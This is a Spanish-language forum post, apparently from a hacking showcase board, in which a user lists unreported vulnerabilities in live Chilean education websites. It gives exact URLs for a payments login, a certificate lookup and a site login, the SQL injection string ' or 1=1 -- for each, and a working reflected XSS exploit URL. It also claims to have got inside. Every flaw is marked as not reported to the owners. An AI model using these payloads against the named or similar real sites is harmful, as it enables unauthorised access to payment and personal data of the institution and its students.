RREEDD
Hola a todos les presento mi primer post en hacking showOff. ;D Espero les guste. Sitio: www.ipchile.cl
Descripción Del Sitio: Instituto de educación técnico profesional Chileno.
Lista de Vulnerabilidades.
- [SQLi] Inyección en login de pagos.
(http://fotos.subefotos.com/5a21ab5a2ffa5666f4a8e85049a04f00o.png)
Url del sitio : http://portal.ipchile.cl/pagoOnLine/pagoOnLine.php (http://portal.ipchile.cl/pagoOnLine/pagoOnLine.php)
Inyeccion : ' or 1=1 --
Reportado: NO
Autor: RREEDD
- [XSS] Inyección en URL .
(http://fotos.subefotos.com/4f935683c6a7f9e9b0a3241d22826c6eo.png)
Url del sitio :http://portal.cepech.cl/gnr/gnrpagos2PR_2.asp?NP=nada&RR=2&EE=6&t=f19f9dd13924c30d66c9902KUcinf (http://portal.cepech.cl/gnr/gnrpagos2PR_2.asp?NP=nada&RR=2&EE=6&t=f19f9dd13924c30d66c9902KUcinf)
Vector : ><script>prompt("underc0de", " By RREEDD");</script>
xploit : portal.cepech.cl/gnr/gnrpagos2PR_2.asp?NP=nada&RR=><script>prompt("underc0de", " By RREEDD");</script>&EE=6&t=f19f9dd13924c30d66c9902KUcinf (http://portal.cepech.cl/gnr/gnrpagos2PR_2.asp?NP=nada&RR=><script>prompt("underc0de",%20"%20By %20RREEDD");</script>&EE=6&t=f19f9dd13924c30d66c9902KUcinf)
Reportado: NO
Autor: RREEDD
- [SQLi] Inyección en sector de consulta de certificados.
(http://fotos.subefotos.com/0060a8010fe132006360df5af0ba36c8o.png)
Url del sitio : http://www.ipchile.cl/consulta-certificado/ (http://www.ipchile.cl/consulta-certificado/)
Inyeccion : ' or 1=1 --
Metodo : POST
Reportado: NO
Autor: RREEDD
- [SQLi] Inyección en sector login.
(http://fotos.subefotos.com/f3af38633af921788de3341113d188bfo.png)
Adentro
(http://fotos.subefotos.com/ca6bf8aa7038257d12027a69c319029fo.png)
Url del sitio : http://www.ipchile.cl/?page_id=17020 (http://www.ipchile.cl/?page_id=17020)
Inyeccion : ' or 1=1 --
Reportado: NO
Autor: RREEDD
Me gustaría si me pueden ayudar a reportarlo.
Saludos desde Chile.